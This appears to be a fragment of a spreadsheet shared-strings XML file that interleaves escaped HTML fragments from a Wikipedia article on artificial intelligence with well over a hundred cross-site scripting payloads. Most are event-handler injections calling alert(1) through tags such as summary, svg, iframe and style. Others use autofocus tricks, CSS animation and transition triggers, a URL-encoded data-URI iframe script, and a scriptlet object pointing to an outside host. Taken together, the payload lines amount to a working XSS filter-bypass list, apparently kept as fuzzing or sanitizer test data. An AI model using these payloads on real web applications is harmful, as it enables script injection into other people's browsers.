    <t xml:space="preserve">	 &lt;/span&gt;. Morgan Kaufmann. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-1-55860-467-4" title="Special:BookSources/978-1-55860-467-4"&gt;&lt;bdi&gt;978-1-55860-467-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+A+New+Synthesis&amp;amp;rft.pub=Morgan+Kaufmann&amp;amp;rft.date=1998&amp;amp;rft.isbn=978-1-55860-467-4&amp;amp;rft.aulast=Nilsson&amp;amp;rft.aufirst=Nils&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fartificialintell0000nils&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;summary onpointerup=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Construct_(philosophy)" title="Construct (philosophy)"&gt;Construct &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onbeforepaste="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;a onbeforecut="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext ondblclick="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onkeyup="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. One advantage of neuroevolution is that it may be less prone to get caught in "dead ends".&lt;sup id="cite_ref-245" class="reference"&gt;&lt;a href="#cite_note-245"&gt;&amp;#91;234&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerover=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt;  &lt;div id="left-navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Francis_Heylighen" title="Francis Heylighen"&gt;Francis Heylighen &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;summary draggable="true" ondrag="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;applet id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;h2&gt;Solving specific problems&lt;a class="headerlink" href="#solving-specific-problems" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;th onpointerover=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;header onkeyup="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;image draggable="true" ondrag="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;map onmouseover="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-100"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-100"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;s style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;style oncut="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="jump-to-nav"&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;label id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmousedown="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpaste="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;hr onpointerover=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;dir ondblclick="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;mark onbeforecopy="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;font draggable="true" ondragenter="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dir style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Perception"&gt;Perception </t>
  </si>
  <si>
    <t>&lt;nav onmouseout="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jacque_Fresco" title="Jacque Fresco"&gt;Jacque Fresco &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;option id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/option&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onbeforecut="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onmousemove="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;time onbeforepaste="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;title onbeforecut="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;pre onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/pre&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;712–724, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;section onbeforecut="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;noscript ondragover=alert(1) contenteditable&gt;drop here&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=cnet&amp;amp;rft.atitle=Getting+Machines+to+Think+Like+Us&amp;amp;rft.date=2006-07-03&amp;amp;rft.aulast=Skillings&amp;amp;rft.aufirst=Jonathan&amp;amp;rft_id=http%3A%2F%2Fnews.cnet.com%2FGetting-machines-to-think-like-us%2F2008-11394_3-6090207.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body ontouchstart=alert(1)&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;i id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/wbr&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;html onkeypress="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;center onmousedown="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;  &lt;small class="date-container"&gt;&lt;i&gt;(&lt;span class="date"&gt;January 2020 </t>
  </si>
  <si>
    <t>&lt;a href="/wiki/DARPA" title="DARPA"&gt;DARPA &lt;/a&gt; pours money into undirected pure research into AI during the 1960s:</t>
  </si>
  <si>
    <t>&lt;body onmouseover="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Winograd, Terry (January 1972). "Understanding natural language". &lt;i&gt;Cognitive Psychology &lt;/i&gt;. &lt;b&gt;3 &lt;/b&gt; (1): 1–191. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2F0010-0285%2872%2990002-3"&gt;10.1016/0010-0285(72)90002-3 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cognitive+Psychology&amp;amp;rft.atitle=Understanding+natural+language&amp;amp;rft.volume=3&amp;amp;rft.issue=1&amp;amp;rft.pages=1-191&amp;amp;rft.date=1972-01&amp;amp;rft_id=info%3Adoi%2F10.1016%2F0010-0285%2872%2990002-3&amp;amp;rft.aulast=Winograd&amp;amp;rft.aufirst=Terry&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Programming_team" title="Programming team"&gt;Programming team &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpaste="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onmousedown="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;datalist draggable="true" ondragenter="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;main id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;colgroup style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFButler1863" class="citation news"&gt;&lt;a href="/wiki/Samuel_Butler_(novelist)" title="Samuel Butler (novelist)"&gt;Butler, Samuel &lt;/a&gt; (13 June 1863). &lt;a rel="nofollow" class="external text" href="http://www.nzetc.org/tm/scholarly/tei-ButFir-t1-g1-t1-g1-t4-body.html"&gt;"Darwin among the Machines" &lt;/a&gt;. Letters to the Editor. &lt;i&gt;&lt;a href="/wiki/The_Press" title="The Press"&gt;The Press &lt;/a&gt; &lt;/i&gt;. Christchurch, New Zealand&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;16 October </t>
  </si>
  <si>
    <t>&lt;multicol onblur=alert(1) tabindex=1 id=x&gt;&lt;/multicol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onmouseup="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Demarcation_problem" title="Demarcation problem"&gt;Demarcation problem &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 onactivate=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=report&amp;amp;rft.btitle=Searle%2C+Subsymbolic+Functionalism+and+Synthetic+Intelligence&amp;amp;rft.pages=AI94-222&amp;amp;rft.pub=University+of+Texas+at+Austin&amp;amp;rft.date=1994-06&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.38.8384&amp;amp;rft.aulast=Law&amp;amp;rft.aufirst=Diane&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Ethics_of_artificial_intelligence" title="Ethics of artificial intelligence"&gt;Ethics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerout=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;menuitem ondragover=alert(1) contenteditable&gt;drop here&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;s id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointermove=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;font id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style onmousemove="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Brooks, Rodney (10 November 2014). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20141112130954/http://www.rethinkrobotics.com/artificial-intelligence-tool-threat/"&gt;"artificial intelligence is a tool, not a threat" &lt;/a&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.rethinkrobotics.com/artificial-intelligence-tool-threat/"&gt;the original &lt;/a&gt; on 12 November 2014. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=artificial+intelligence+is+a+tool%2C+not+a+threat&amp;amp;rft.date=2014-11-10&amp;amp;rft.aulast=Brooks&amp;amp;rft.aufirst=Rodney&amp;amp;rft_id=http%3A%2F%2Fwww.rethinkrobotics.com%2Fartificial-intelligence-tool-threat%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015chapter_6-212"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015chapter_6_212-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/address&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;cite draggable="true" ondragend="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>document.write(sadfsa)</t>
  </si>
  <si>
    <t>&lt;button onpaste="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=41" title="Edit section: Law-related professions"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;p draggable="true" ondragenter="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;script id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;th onmouseover="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Interactive_evolutionary_computation" title="Interactive evolutionary computation"&gt;Interactive evolutionary computation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cyberwarfare" title="Cyberwarfare"&gt;Cyberwarfare &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Goertzel, Ben; Lian, Ruiting; Arel, Itamar; de Garis, Hugo; Chen, Shuo (December 2010). "A world survey of artificial brain projects, Part II: Biologically inspired cognitive architectures". &lt;i&gt;Neurocomputing &lt;/i&gt;. &lt;b&gt;74 &lt;/b&gt; (1–3): 30–49. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.neucom.2010.08.012"&gt;10.1016/j.neucom.2010.08.012 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Neurocomputing&amp;amp;rft.atitle=A+world+survey+of+artificial+brain+projects%2C+Part+II%3A+Biologically+inspired+cognitive+architectures&amp;amp;rft.volume=74&amp;amp;rft.issue=1%E2%80%933&amp;amp;rft.pages=30-49&amp;amp;rft.date=2010-12&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.neucom.2010.08.012&amp;amp;rft.aulast=Goertzel&amp;amp;rft.aufirst=Ben&amp;amp;rft.au=Lian%2C+Ruiting&amp;amp;rft.au=Arel%2C+Itamar&amp;amp;rft.au=de+Garis%2C+Hugo&amp;amp;rft.au=Chen%2C+Shuo&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;"A physical symbol system has the necessary and sufficient means of general intelligent action." Newell and Simon argue that intelligence consists of formal operations on symbols.&lt;sup id="cite_ref-Physical_symbol_system_hypothesis_353-0" class="reference"&gt;&lt;a href="#cite_note-Physical_symbol_system_hypothesis-353"&gt;&amp;#91;342&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Hubert_Dreyfus" title="Hubert Dreyfus"&gt;Hubert Dreyfus &lt;/a&gt; argued that, on the contrary, human expertise depends on unconscious instinct rather than conscious symbol manipulation and on having a "feel" for the situation rather than explicit symbolic knowledge. (See &lt;a href="/wiki/Dreyfus%27_critique_of_AI" class="mw-redirect" title="Dreyfus&amp;#39; critique of AI"&gt;Dreyfus' critique of AI &lt;/a&gt;.)&lt;sup id="cite_ref-354" class="reference"&gt;&lt;a href="#cite_note-354"&gt;&amp;#91;343&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Dreyfus&amp;#39;_critique_355-0" class="reference"&gt;&lt;a href="#cite_note-Dreyfus&amp;#39;_critique-355"&gt;&amp;#91;344&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpointermove=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNRC1999"&gt;NRC 1999 &lt;/a&gt;, pp.&amp;#160;210–211 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;param onblur=alert(1) tabindex=1 id=x&gt;&lt;/param&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;address onmousedown="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFNorvig2012"&gt;Norvig 2012 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;menu id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;P. J. Werbos. Generalization of backpropagation with application to a recurrent gas market model" &lt;i&gt;Neural Networks &lt;/i&gt; 1, 1988. </t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 onactivate=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;footer ondrop=alert(1) contenteditable&gt;drop here&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;basefont id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerleave=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointerout=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Concurrent_computing" title="Concurrent computing"&gt;Concurrent computing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpaste="alert(1)" contenteditable&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;set onend=alert(1) attributename=x dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;del onblur=alert(1) tabindex=1 id=x&gt;&lt;/del&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Electronic_publishing" title="Electronic publishing"&gt;Electronic publishing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onblur=alert(1) tabindex=1 id=x&gt;&lt;/abbr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>tYPE="text/x-scriptlet" DATA="http://.rocks/scriptlet.html</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;abbr ondragover=alert(1) contenteditable&gt;drop here&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;br onmouseleave="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmousedown="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;section onpointerout=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015-152"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015_152-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">            &lt;a href="//readthedocs.org/projects/scrapy/?fromdocs=scrapy"&gt;Project Home&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Logic_programming" title="Logic programming"&gt;Logic programming &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointerenter=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Ontology-98"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Ontology_98-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;spacer ondrop=alert(1) contenteditable&gt;drop here&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointermove=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;br draggable="true" ondragleave="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmousedown="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Neats_vs._scruffies" class="mw-redirect" title="Neats vs. scruffies"&gt;Neats vs. scruffies &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/del&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;small onbeforepaste="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onpointerenter=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;q onpointerleave=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_complexity_theory" title="Computational complexity theory"&gt;Computational complexity theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-vinyals2015-275"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-vinyals2015_275-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Watson_(computer)" title="Watson (computer)"&gt;Watson &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;hgroup oncontextmenu="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=69" title="Edit section: In fiction"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Knowledge_engineering-92"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Knowledge_engineering_92-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dialog id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;210. </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;script id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science+%7C+AAAS&amp;amp;rft.atitle=Artificial+intelligence+can+%27evolve%27+to+solve+problems&amp;amp;rft.date=2018-01-10&amp;amp;rft_id=http%3A%2F%2Fwww.sciencemag.org%2Fnews%2F2018%2F01%2Fartificial-intelligence-can-evolve-solve-problems&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;samp onpointerenter=alert(1)&gt;XSS&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Transhumanism" title="Transhumanism"&gt;Transhumanism &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;colgroup oncontextmenu="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerdown=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;center onkeypress="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerenter=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
